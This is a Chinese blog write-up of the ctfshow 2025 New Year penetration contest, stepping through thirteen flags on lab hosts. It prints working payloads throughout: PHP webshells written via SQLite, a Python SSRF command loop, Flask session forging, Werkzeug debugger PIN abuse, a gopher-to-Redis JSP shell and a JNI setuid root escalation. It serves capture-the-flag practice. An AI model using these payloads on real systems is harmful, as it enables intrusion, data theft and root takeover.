2025元旦渗透赛复现-ctfshow

于 2025-01-17 08:00:00 发布
阅读量2.2k 收藏 14
点赞数 18
CC 4.0 BY-SA版权
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81133475/article/details/145187290

2025ctfshow元旦渗透赛

若图片不好使娶我blog👇

https://ddl08.github.io/

所有参考将在文章结尾给出

第一章

flag1-压缩包

压缩包密码爆破

image-20250112184336653

flag2-图片-密码

压缩包里面有个图片

PNG 文件的尾部标识符

49 45 4E 44 AE 42 60 82

image-20250112184756187

提取出后边多余的文件base64解密👇出来个这个

if __name__ == '__main__':
    try:
        import secretMessageResponse
    except ImportError:
        import pip
        pip.main(['install', 'secretMessageResponse'])
        from secretMessageResponse import printMessage

拿python运行一下没出来一堆数据

去找库👇

pip show secretMessageResponse

image-20250112190033665

crypto环境问题

from Crypto.PublicKey import RSA ModuleNotFoundError: No module named ‘Crypto’ 解决方法: (1)安装pycryptodome库 : pip install pycryptodome 如果site-packages中存在crypto、pycrypto,在pip之前,需要pip uninstall crypto、pip uninstall pycrypto,否则无法安装成功。 (2)安装完成后将site-packages中crypto文件夹中的首字母c改为改为大写的C

求私钥

from Crypto.PublicKey import RSA
​
p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n = 633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417
e = 0x10001
​
# 计算其他相关参数
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
​
# 生成私钥
key = RSA.construct((n, e, d, p, q))
private_key = key.export_key()
print(private_key.decode('utf-8'))

求公钥

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
​
# 提供的PEM格式公钥
pem_key = b"""
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAmziayo9Tddo1FYdrtOsw
yjLYJ5frYKEwm4rQTsKU8UcdnnDRgms+ZmStoqlH/qi6x+D1K3fvvioCnGZLFHZw
BUqbgT5x+qUmUaVMll9FOT7ZJ05w8n8Ljqa1akzFMU5G7YbCr3vQwN63vwvD9/63
TDbXkJrv1fGl2rHpPwp5OPCUeCB3nIFIRCWHpJU7sHJqIP5vzV8KNJtbxgR+dhsz
dg+NhoBDUpxoVN5lzSKr2TMOLFLZaQR9AWOV/aHV8gjTkTLDZfc+XlfhxiDMTQdi
UTbk/tynpt+JFrDA8vL5/TOmuxgumqgXZIPGrIUbwloTYyHD/XXmvXu5KE8g3eMK
gxNxuEKM5bMTESBK9A7Q2Kj3eNp0Rvb5Aleg7h8/YbQemGelY/o5xpUyHgHjsfNQ
3j/xhdhVCNVaXZF64V/YVpvC9Cq29F7qI+bl6FlN7zSpuHB3QgNS1uXOmjBCsA7y
pZoWmdXeaLIO+I3kP48BBSmue4nidJifiK/kSOcZ0iegRXV1hyZ6pYdDE7hM5V5t
5tvayJ31zRQNT2ALAFeCDozVWELHTnphkPkQO+SOPglrVz0S1dXicqRofXWMj7PJ
OFkBpWIX0aywMIh1woEAawUs3RM2pfLUNtqUTfodSCmWlwcpGrBWG5NACx7csPFt
zWn8oPZfzL346at5DDIwD2kCAwEAAQ==
-----END PUBLIC KEY-----
"""
​
# 从PEM格式公钥中加载公钥
public_key = serialization.load_pem_public_key(
    pem_key,
    backend=default_backend()
)
​
# 提取模数(n)和公钥指数(e)
n = public_key.public_numbers().n
e = public_key.public_numbers().e
​
print("模数(n):", n)
print("公钥指数(e):", e)
​

解密脚本

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
​
message = {
    "inputMessage_20241216" :'''gHgAsclUVPhWDv4S8Oa8SuRTDaj+V0dI4z2jrQwfvfSFWilWwMKwNULUI48UBLS2shZcm/yv2/e5Hq5VRDfXkdxCYQMdvdnvONtpm2yNiIaLpDV4Rs8fOXJ6kcaeT+mg4RkIIFgx35w4J1KgO72pSP8j1p+R9f9TNMafwJ91XmO4QTcOYkMKQMddKvhbyMXzJkSS0uZqEppNSIUnVX9b7m8PmMjV0uHShvb1Zc8UQWJWUJ3cOxwNasOeMQGxJrZXPkxIxDYzm3f0tXbCgvdgNZ8TQY7u+iCXjOtD6xnUsdSahnPq14BD30CilIfsG0r/klPHfxQ+psmHSX47Ylai0TtgfbHWJJ4lSo0ojMvTx6HYK8zmAoCmg4OGXDbv/IjJgYU1w24na0iXZCNtcjB9MLRNck00c20f/uS64Ss0Ixii8nmfsFOjQBCcIYN+HGmOnj5Uw8DVJrxlOmcfQciG3rzuIvYlbOdGMcyarTy2Ba7iZfoovYZObPscAwhNLWqbU4tuR78aOVxiXTFRY7+Y0x2eRT5sulcvB3vsKuDMlNrxaUgiFUohPBZGNsgQgyCPxxqk0NpUn0bbHLH+vBebjJxaim4AU28ctWW8xv7xpxVttb0EoohtK2cIHr79ep5XrU/rv4R58obD/o+QqI1Mrb4wwpX9tsL7ZbROw/MXJwM=''',
    "inputMessage_20240411" : '''Z93Khatj+AWZcpPwIqu8LzbJ8xb8CuVMI8okE0qwoQD2IC2lixg77mJZireOrbW7zFkDsk1hP67dROJZwVUDrYot2g5GxX/xy7lGjIblUX4iJVUtP4mHqZUgKROaLoh/gippMpP+8Ik2X/QRBx5gdhq0xam+wuVC+77/tyu8Fd/DohKbAMp8aaJsFr/W4mLDZ1gv4JK+2O3l+bAvpodBRTzb0ld5zD2ueYvjTudoDjdanQP1oVTH7pkDO2Vb+SsdIyTi2C410JEOF4Qm8mzVHtiOunOcLVpAlQsM6/LdhqsTNelXl/Myb84NGxwGWVmx6j2QejiL7S1hHeHlmQ9ExHeURPdZAvKhgMCemYXu3BGlFq3ydb5SkqwLFvM4vJ6XUBcWkHT8eijBFF6Y7YgOv9GRvBTnsAQhUBp4W4EAMtXkDdToG+S8ZO7El8Gh8jaWC49n5CuUBRz3z2GeOVbsBamfLV06IO5v78jGHXig4saEFKHvYSIGewyUCVQEGoIR5xOTJBTUTePAdvQjfg28vZZxFB/hIYNDUHkaek1Mg1UH5HWGgsCX1In5hSX/9eBkznEhzeWnJ1yMsYkj+ddN34DLQSrHc83geXMcoW3Ah3cAQG8E8bszvKL3hme+T5rOeENjkOAgYhf84k4YlxDskdwvzyu8HkE9CSaBpDP6lKI=''',
    "inputMessage_20240305" : '''ckDSthpl5DDJMpBE26Jqk8EjaSq7MUntdwLHPouwx6D38un6WQfLJ9wgDyjh9GA/ICJR7WrwWsVinr6y3u9w+ubMZ0mqmtnphzQraagk8NkKc1u1+qGp8llsud3C8mvJWa4GYa9KEhnACDHwppPKJDCfr1HKwPbR0NIi+1Aunmy6DeOKRkFwysnrSco5QiiC9+gdXFhQDmN9KEiYW6Pc3mWVbqFiJgRW3/Df6638oGPm6AUcgRnEWMKiluyN81frM9VNtCeJ64YrU6Rgx4D153YxNNQbLTcyCQMamHTrJnhxPojkuDqbEcU+iiN4offwrQyr4eEu9ecvmyD2w/n7pAOsVnqSzroBujVA+CK6Zq8Uie15mL5yWG9hD5ZcbSwnRmtqK3yl0Xl91hgn1JqcIEKtf+MnMQPr80uoxT3mz8IX8pyVnyyw1x6F+IK1I2G+5w6rUDjhzIbME5XB9hopwcswsXrMo9PP6/5Sz1noJrsu6k6WN8ZM0MyRIav+xuKP1+cYzlPSQZrMo3L4ieHQnBbsoyzGVf9QONMwaooGOrxu88ZWlGe8e7eyCzteeNSVOC2zqtQiwQJIgfp2UwTymA/cEjOICWVzUXwbE5wWUBPCLp2C/XWc82byrOHAFXHLOVKgolVToUpZ5uOvizgk/ahaxdGxGa9CrRyr6sf+goA=''',
​
}
​
from Crypto.PublicKey import RSA
from Crypto.Util.number import *
import base64
p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
​
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
​
n = p * q
e = 0x10001
d = inverse(e,(p - 1) * (q - 1))
pub = RSA.construct((n,e,d,p,q))
​
with open('out.pem','wb') as f:
    f.write(pub.exportKey('PEM'))
with open('out.pem','rb') as f:
    pri_key = f.read()
# print(pri_key)
​
private_key = serialization.load_pem_private_key(pri_key,password=None,backend=default_backend())
​
for key, value in message.items():
    encrypted = base64.b64decode(value)
    message = private_key.decrypt(
        encrypted,
        padding.OAEP(
            mgf=padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None
        )
    )
    print(base64.b64decode(message).decode())

得出

Park:
你的行动已经暴露,24小时内迅速撤离,销毁所有资料,将现有资料统一上传到【任务中心】
发送人:Dylan
Park:
总部已经为你安排新的身份,请务必在3日内抵台,你的新身份是新竹县动物保护防疫所网络安全顾问,【任务中心】账号密码和你任职单位网站的数据库用户名密码一致,请尽快修改
发送人:Dylan
Park:
【任务中心】网址已变更为 https://task.ctfer.com ,请注意修改浏览器地址栏中的链接
发送人:Dylan

flag3-wp漏洞+基础账户

从这突然好玩了起来

根据2的提示去获得账号密码

根据对应网进数据库查,网页源代码是wordpress的,

扫一扫查一查

https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b/

漏洞验证

?aam-media=wp-config.php
ctfshow{hsinchug_wp1_Q.4Vyj8VCiedX1KYU5g05}

第二章

flag4-jwt伪造+第二个账户

image-20250112204506758

查看电话号码的地方可以抓包,根据提示是jwt,key在火堆里面

image-20250112204637315

4a4f7d6e8b5 ?0c7f

4a4f7d6e8b5e3a0c7f

爆破

hashcat -a 3 -m 16500 hash.txt --custom-charset1=?l?d 4a4f7d6e8b5?1?1?10c7f

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoc2luY2h1Z193cDEiLCJleHAiOjE3MzY3NzIyNTV9._fw255qGHn4l9BtB6Uw2AifVgb9Z5xd7Grl41Q7S7LU

出结果

ctfshow{117447685307}

flag5-文件读取+root账户+app.py.bak(含密码

拿新的身份去查看新的admin功能,抓个包,一个是遍历文件,一个是查看文件

image-20250112211547417

访问init_users.json获得flag

ctfshow{7y.(sc#Ac_}

flag6-ssrf+secret_key

Server Info菜单发现内网IP地址

有个download task file的页面可以试试内网访问

ctfshow{0x8F7C71E8E82E4D1E}

第三章

flag7-ssrf传码,获取shell

sqllite写码

?dsn=sqlite:shell.php&username=aaa&password=bbb&query=create table "aaa"(name TEXT DEFAULT "<?php file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");

没好使,用的下边的

http://172.2.198.5/?username=1%26password=1%26query=CREATE TABLE users (name TEXT);%26dsn=sqlite:b.php
http://172.2.198.5/?username=1%26password=1%26query=INSERT INTO users (name) VALUES ('<?php file_put_contents("4.php","<?php system(\$_GET[0]);?>");?>');%26dsn=sqlite:b.php
http://172.2.198.5/b.php
http://172.2.198.5/4.php?0=ls;
http://172.2.198.5/4.php?0=cat config.php;
法二

原内容

%3fdsn=sqlite:shell.php%26username=aaa%26password=bbb%26query=create%20table%20"aaa"%20(name%20TEXT%20DEFAULT%20"<?php%20file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");

输入

http://172.2.198.5/%3fdsn=sqlite:shell.php%26username=bbb%26password=bbb%26query=create%20table%20%22bbb%22%20(name%20TEXT%20DEFAULT%20%22%3C?php%20file_put_contents(%271.php%27,%27%3C?php%20eval($_GET[1]);?%3E%27);?%3E%22);

再访问shell.php然后虽然报错但是码写进去了,然后去1.php

flag8-眼看

根目录有个secret.txt打开,里面有邮箱账号+密码的base64

网易邮箱登录可以看到81192

第四章

flag9-session伪造-ssrf+key

打.6:8888进去就会给个session,访问/key会拒绝,伪造一个

根据flag5那的py.bak源代码里的伪造一个

python flask_session_cookie_manager3.py decode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -c eyJ1c2VyIjoiZ3Vlc3QifQ.Z4dF3w.FEE9qzWhV0dbFQ-ZNfYo7eqpr6o
python flask_session_cookie_manager3.py encode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -t "{'user': 'admin'}"
eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY

在通过刚才获取的shell去ssrf

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/key"

flag10-flask日志文件getshell

思路

  • 查看werkzeug的源码

    • werkzeug是Python实现的WSGI规范的使用函数库。

    • WSGI是一种服务器和客户端交互的接口规范

  • curl

    • -v 选项启用了 详细模式

    • -c cookie.txt

      • 这个选项指定 curl 在完成请求后,将从服务器返回的 Cookies 保存到 cookie.txt 文件中。

    • -b

      • 这个选项用来指定 curl 发送请求时使用 指定的 Cookie 文件。

操作
法三

附上脚本

import base64
import requests
import urllib.parse

while True:
    data = input("> ")
    # data = urllib.parse.quote(data)
    # python_shell = 'curl --cookie "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z3kddg.CjbNhdNFa_7H--igibxBzM2omNk;__wzd2fb5743f98b45463400e=1736152460|4bfc86e353c8" "http://172.2.252.6:8888/console?__debugger__=yes&s=eABh7cMeNgMKri1DSi4w&cmd={}&frm=1"'.format(data)
    # python_shell = base64.b64encode(python_shell.encode()).decode()
    data = base64.b64encode(data.encode()).decode()
    # normal_shell = 'echo "' + data + '" | base64 -d | sh'
    normal_shell=data
    # url = "https://543f943e-6f90-43b4-bfc8-ee86d2fb3f34.challenge.ctf.show/downloadTaskFile?url=http://172.2.239.5/1.php?1=phpinfo();"
    url = "http://6bcb3e8b-f3e3-4103-86b7-e8d9a9df8f92.challenge.ctf.show/downloadTaskFile?url=http://172.2.198.5/1.php?1=system(base64_decode(\""+normal_shell+"\"));"
    response = requests.get(url, verify=False, headers={'Authorization': "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJkeWxhbiIsImV4cCI6MTczNzAwNTIwOH0.6I2CU7u2c96zkz_HhdEg2NvuvwdvLSsAjfIom3b80Jw"})
    try:
        # print(url)
        # print(response.json())
        # print(response.json()["url"])
        print(response.json()["file_content"])
    except:
        print("Error")
        continue

修改日志

/set_log_option%3flogName=werkzeug%2526logFile=main.log

获取console的密码

/console

21hr1yWBaAg5kQrHGHW

写入

curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl"

查看

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"

获取pin码

/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl
143-535-858

验证

curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"

保存cookie

curl -c cookie.txt -v -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"

利用cookie命令执行

curl -v -b  "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=__import__('os').system('''cat%20\/etc\/passwd>.\/log\/main2.log''')&frm=0&s=21hr1yWBaAg5kQrHGHWl"

没写进去,换shell

http://172.2.198.5/1.php?1=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDgwNWJkYTg2MDM3ODdhMTI0MmNkPTE3MzY5MjY0MDJ8MTJhMzJjOTc4YTI2IiAiaHR0cDovLzE3Mi4yLjE5OC42Ojg4ODgvY29uc29sZT9fX2RlYnVnZ2VyX189eWVzJmNtZD1vcy5zeXN0ZW0oJycnY2F0JTIwXC9ldGNcL3Bhc3N3ZD4uXC9sb2dcL21haW4yLmxvZycnJykmZnJtPTAmcz0yMWhyMXlXQmFBZzVrUXJIR0hXbCI='));
http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main2.log"

读取

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"

直接读

 curl -v -b  "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=21hr1yWBaAg5kQrHGHWl"

第五章

flag11

直接访问7的8080端口,是Jetty Server

  1. 敏感文件读取

    • curl  -v  "http://172.2.198.7:8080/%u002e/WEB-INF/web.xml"

    • 直接读出来了

flag12

  1. 先上号

    1. http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJkaWN0Oi8vMTcyLjIuMTgyLjc6NjM4MC9hdXRoOmN0ZnNob3dfMjAyNSI='));
    2. curl  -v  "dict://172.2.182.7:6380/auth:ctfshow_2025"

  2. 再传码

    1. http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJnb3BoZXI6Ly8xNzIuMi4xODIuNzo2MzgwL19hdXRoJTIwY3Rmc2hvd18yMDI1JTBBc2V0JTIwbWFycyUyMCUyMiUzQyUyNSUyMFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3JTIwU3RyaW5nJTVCJTVEJTdCJTVDJTIyc2glNUMlMjIlMkMlNUMlMjItYyU1QyUyMiUyQ3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCU1QyUyMmNtZCU1QyUyMiklN0QpJTNCJTI1JTNFJTIyJTBBY29uZmlnJTIwc2V0JTIwZGlyJTIwJTJGb3B0JTJGamV0dHklMkZ3ZWJhcHBzJTJGUk9PVCUyRiUwQWNvbmZpZyUyMHNldCUyMGRiZmlsZW5hbWUlMjAyLmpzcCUwQXNhdmUlMEFxdWl0Ig=='));

  3. 读取文件

    1. 发现命令没有回显,写入web服务目录/opt/jetty/webapps/ROOT/

    2. 2.jsp?cmd=ls%20/>/opt/jetty/webapps/ROOT/success.txt
    3. 2.jsp?cmd=cat%20/dylan.txt>/opt/jetty/webapps/ROOT/success.txt

flag13

  1. 查询cap权限

    1. getcap%20-r%20/%202>/dev/null>/opt/jetty/webapps/ROOT/success.txt
    2. /usr/local/openjdk-8/bin/java = cap_setuid+ep

  2. setuid提权

  3. 写setuid.c

    1. 2.jsp?cmd=echo%20"I2luY2x1ZGUgPGpuaS5oPgovLzExMTExMTExMTExMjIKI2luY2x1ZGUgPHVuaXN0ZC5oPgoKSk5JRVhQT1JUIGppbnQgSk5JQ0FMTCBKYXZhX1NldFVJRF9zZXRVSUQoSk5JRW52ICplbnYsIGpvYmplY3Qgb2JqLCBqaW50IHVpZCkgewogICAgcmV0dXJuIHNldHVpZCh1aWQpOwp9"%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.c
    2. #include <jni.h>
#include <unistd.h>

JNIEXPORT jint JNICALL Java_SetUID_setUID(JNIEnv *env, jobject obj, jint uid) {
    return setuid(uid);
}

  4. setuid.java

    1. 2.jsp?cmd=echo%20"cHVibGljIGNsYXNzIFNldFVJRCB7CiAgICBzdGF0aWMgewogICAgICAgIFN5c3RlbS5sb2FkTGlicmFyeSgiU2V0VUlEIik7IAogICAgfQoKICAgIHB1YmxpYyBuYXRpdmUgaW50IHNldFVJRChpbnQgdWlkKTsgCiAgLy9hCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTZXRVSUQgc2V0VUlEID0gbmV3IFNldFVJRCgpOwogICAgICAgIGludCByZXN1bHQgPSBzZXRVSUQuc2V0VUlEKDApOyAKICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKG5ldyBTdHJpbmdbXXsic2giLCItYyIsImNhdCAvcm9vdC8qLnR4dD4vb3B0L2pldHR5L3dlYmFwcHMvUk9PVC9yb290LnR4dCJ9KTsKICAgIH0KfQ=="%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.java
    2. public class SetUID {
    static {
        System.loadLibrary("SetUID"); 
    }

    public native int setUID(int uid); 

    public static void main(String[] args) throws Exception {
        SetUID setUID = new SetUID();
        int result = setUID.setUID(0); 
        Runtime.getRuntime.exec(new String[]{"sh","-c","cat /root/*.txt>/opt/jetty/webapps/ROOT/root.txt"});
    }
}

  5. 编译

    1. 2.jsp?cmd=javac%20/opt/jetty/webapps/ROOT/SetUID.java
    2. 2.jsp?cmd=gcc%20-shared%20-fPIC%20-o%20/opt/jetty/webapps/ROOT/libSetUID.so%20-I${JAVA_HOME}/include%20-I${JAVA_HOME}/include/linux%20/opt/jetty/webapps/ROOT/SetUID.c

  6. 执行

    1. 2.jsp?cmd=java%20-Djava.library.path=/opt/jetty/webapps/ROOT/%20-cp%20/opt/jetty/webapps/ROOT/%20SetUID

参考

https://chenxi9981.github.io/ctfshow_%E5%85%83%E6%97%A6%E6%9D%AF/
https://www.cnblogs.com/LAMENTXU/articles/
https://ysynrh77rj.feishu.cn/docx/F3nJdGJHjo1DSBx8c2TcecLrnvh

评价

挺难的,感觉我自己做不能出,

疑惑点是flag10这,还有flag13这,13是真不会,记住payload下回直接用了

DDL07
关注
CTFshow元旦水友-web-easy include
jwkaaaaaa的博客
05-22 713
CTF元旦水友-web-easy include wp
【Web】CTFSHOW元旦水友部分wp_ctfshow元旦水友wp
2401_84281629的博客
04-27 1006
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
CTFSHOW元旦2025
最新发布
c582037的博客
01-09 4090
ctfshow元旦2025
新手参加2025年CTF大——Web题目的基本解题流程
2401_84488651的博客
12-09 1119
信息收集:通过扫描、查看网页源代码、访问Web服务等获取目标信息。漏洞发现:通过尝试常见的漏洞(如SQL注入)找出应用漏洞。利用漏洞:通过利用漏洞获得敏感信息,如flag。提交:获取flag并提交。以上是一个CTF Web题目的基本解题流程,针对不同类型的题目(如Pwn、Forensics、Crypto等),解题过程会有所不同,但基本的思路和方法都是信息收集→漏洞发现→漏洞利用→提交flag。
ctfshow2024元旦杯web
NYG694的博客
01-04 2454
2024ctfshow水友元旦杯web方向题解---更新中
2024年网络安全最全ctfshow web入门 爆破web25详解_ctfshow web25,重难点整理
2401_84264692的博客
05-11 810
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
微信小程序生成二维码并通过fastdfs保存
Arkham的专栏
08-20 2008
   最近在做一个匹配类的微信小程序,需要用到二维码分享功能,下面就分享一下开发步骤 一、获取appid和secret    获取微信小程序的appid和secret可以直接去微信公众平台上获取,在设置&gt;&gt;开发设置里面即可找到 二、获取openid    要获取当前登陆者的openid,需要先获取登录动态code,代码如下: wx.login({ ...
2025元旦和新年春节倒计时
12-23
2025元旦和新年春节倒计时即将临近,各地网页设计师和开发人员都在准备迎接这一重要时刻的到来。为了让广大网民可以方便地在浏览器中查看这两个重要节日的倒计时,已经有开发者分享了相应的html网页源代码。这些代码...
2024元旦倒计时代码-html + css + js
01-10
例如,如果你想改为2025年的春节倒计时,可以将`"Jan 1, 2024 00:00:00"`改为相应的日期。 通过理解并修改上述代码,您可以轻松地创建自定义的倒计时器,不仅限于元旦,还可以应用于生日、婚礼、节假日等各种场合。...
元旦倒计时代码-2022年超好看的元旦倒计时
12-11
"元旦倒计时代码-2022年超好看的元旦倒计时"这个标题表明,我们讨论的是一个与2022年元旦相关的编程代码,它的主要功能是显示倒计时,而且设计得非常美观。元旦倒计时通常用于网站或应用程序上,为用户提供节日即将...
【Web】CTFSHOW元旦水友部分wp
uuzeray的博客
01-02 4566
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
2024ctfshow元旦水友 RE re_signin
Pisces50002的博客
01-07 806
41行 获取128个字符,v8算个长度,读入到回车就停止。对每一个字符,加上一个v7,再异或v7>>4,很简单的签到题,然而我把加密函数看花眼了。v6是用来记录上次的result。47行 比对密文,s2已经给出。主要函数部分可以直接看到。45行 生成了一个key。进encrypt看一下。
CTFshow元旦水友web部分题解
qq_34942239的博客
01-27 2201
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
TypeError: The view function did not return a valid response. The function either returned None 的解决
weixin_54628931的博客
04-18 7967
使用flask框架制作登录、注册的页面时,app.py运行成功,数据库有用户,1234,密码也是1234 点击登录之后, 报如下错误。 TypeError TypeError: The view function did not return a valid response. The function either returned None or ended without a return statement. 页面截图如下: 查网上的报错,解决办法是路由没有返回东西,于是我改了r.
调试神器debugger和console总结
张木期的博客
